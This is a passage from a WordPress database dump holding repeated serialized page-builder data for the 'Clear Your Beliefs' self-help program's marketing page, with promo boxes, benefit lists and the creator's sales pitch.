-43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"<strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong>\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:10;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1078:"<p>[su_tabs active="2"][su_tab title="What You Can Accomplish with Clear Your Beliefs "]</p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul><p>[/su_tab]</p><p>[su_tab title="How and Why It Works"]</p><ul><li>Beliefs are the major cause of upset and unhappiness</li><li>CYB clears beliefs at the core of the psyche, where they live</li><li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li><li>You take charge and decide what you want to believe</li><li>You’re guided gently, step-by-step, through the entire process</li><li>You decide how far to go, and what changes to make</li></ul><p>[/su_tab][/su_tabs]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:11:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1033, 1534, 'panels_data', 'a:3:{s:7:"widgets";a:11:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"<strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong>\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:10;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1142:"[su_tabs active="2"][su_tab title="What You Can Accomplish with Clear Your Beliefs "]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_tab]\n\n[su_tab title="How and Why It Works"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]\n\n[su_column]1[/su_column][su_column]2[/su_column]";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:11:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1034, 1535, 'panels_data', 'a:3:{s:7:"widgets";a:11:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"<strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong>\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:10;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1136:"[su_tabs active="2"][su_tab title="What You Can Accomplish with Clear 